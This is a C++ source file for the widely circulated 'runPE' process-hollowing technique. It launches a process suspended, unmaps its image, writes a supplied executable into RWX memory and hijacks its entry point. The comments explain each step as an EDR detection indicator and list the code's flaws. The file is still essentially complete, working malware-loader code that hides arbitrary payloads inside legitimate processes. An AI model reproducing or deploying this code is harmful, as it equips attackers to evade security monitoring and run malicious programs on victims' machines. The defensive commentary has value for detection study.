// Function-pointer type for ntdll's NtUnmapViewOfSection. It is not imported
// statically; run() resolves it at runtime with GetProcAddress, so the import
// table of a binary built from this file does not reveal the call.
typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
  2.  
// runPE: the widely circulated "process hollowing" snippet.
//
// From a defender's point of view the call sequence below is the detection
// signature itself: CreateProcessA with CREATE_SUSPENDED, NtUnmapViewOfSection
// on that process, VirtualAllocEx with PAGE_EXECUTE_READWRITE at the freed
// base, a series of WriteProcessMemory calls carrying a PE image, then
// SetThreadContext + ResumeThread. Every one of these steps is visible to
// process-creation callbacks and API/ETW telemetry, which is why this exact
// chain is a standard EDR rule (suspended start + RWX remote allocation +
// thread-context rewrite before first resume).
class runPE{
public:
// Maps the in-memory PE image `pFile` into a fresh, suspended instance of
// `szFilePath` and resumes it at the image's entry point.
//
// Contract as written: no return value and no error reporting. Any failing
// check or API call simply falls through to the VirtualFree at the end, so
// the caller cannot tell success from failure. `pFile` is released with
// VirtualFree(MEM_RELEASE), so it must have come from VirtualAlloc; ownership
// transfers to this function. None of the header offsets read from `pFile`
// (e_lfanew, NumberOfSections, PointerToRawData, SizeOfRawData) are checked
// against the buffer's size, so a malformed image reads out of bounds.
// Only the 32-bit PE layout is handled (Ebx/Eax registers, 4-byte pointers,
// hard-coded 32-bit header sizes).
void run(LPSTR szFilePath, PVOID pFile)
{
    PIMAGE_DOS_HEADER IDH;    // DOS header of the in-memory image
    PIMAGE_NT_HEADERS INH;    // NT headers located via IDH->e_lfanew
    PIMAGE_SECTION_HEADER ISH; // current section header in the copy loop
    PROCESS_INFORMATION PI;    // handles of the suspended target process
    STARTUPINFOA SI;           // zeroed; no startup customization
    PCONTEXT CTX;              // thread context of the target's primary thread
    PDWORD dwImageBase;        // target's current image base, read from its memory
    NtUnmapViewOfSection xNtUnmapViewOfSection; // resolved from ntdll at runtime
    LPVOID pImageBase;         // remote allocation that receives the new image
    int Count;                 // section index
    IDH = PIMAGE_DOS_HEADER(pFile);
    // Only the two magic values are validated; no size or range checks.
    if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
    {
        INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);
        if (INH->Signature == IMAGE_NT_SIGNATURE)
        {
            RtlZeroMemory(&SI, sizeof(SI));
            RtlZeroMemory(&PI, sizeof(PI));
            // Target is created suspended so its primary thread has not yet
            // executed; the process-creation event is the first telemetry point.
            if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
            {
                CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
                CTX->ContextFlags = CONTEXT_FULL;
                if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
                {
                    // The code treats CTX->Ebx + 8 as the address of the
                    // target's image-base field and reads 4 bytes from it;
                    // the value is later compared with the new image's base.
                    ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);
                    if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase)
                    {
                        // Unmap the original executable from the target only
                        // when it occupies the same base the new image wants.
                        // A NtUnmapViewOfSection on a just-created suspended
                        // process is itself a strong detection indicator.
                        xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
                        xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
                    }
                    // 0x3000 is MEM_COMMIT | MEM_RESERVE. A remote RWX
                    // allocation at a fixed address is the second indicator.
                    pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
                    if (pImageBase)
                    {
                        // Headers first, then each section's raw data at its
                        // virtual address. 248 and 40 are the 32-bit sizes of
                        // IMAGE_NT_HEADERS and IMAGE_SECTION_HEADER respectively.
                        WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
                        for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
                        {
                            ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
                            WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
                        }
                        // Patch the image-base field the earlier read came from,
                        // then point Eax (the start address the suspended thread
                        // will use) at the new image's entry point.
                        WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
                        CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;
                        // Context rewrite followed by the first ResumeThread:
                        // the final, and most commonly alerted, step of the chain.
                        SetThreadContext(PI.hThread, LPCONTEXT(CTX));
                        ResumeThread(PI.hThread);
                    }
 
                }
            }
        }
    }
    // Reached on every path, success or not. PI.hProcess/PI.hThread and the
    // CTX allocation are never released here.
    VirtualFree(pFile, 0, MEM_RELEASE);
}
};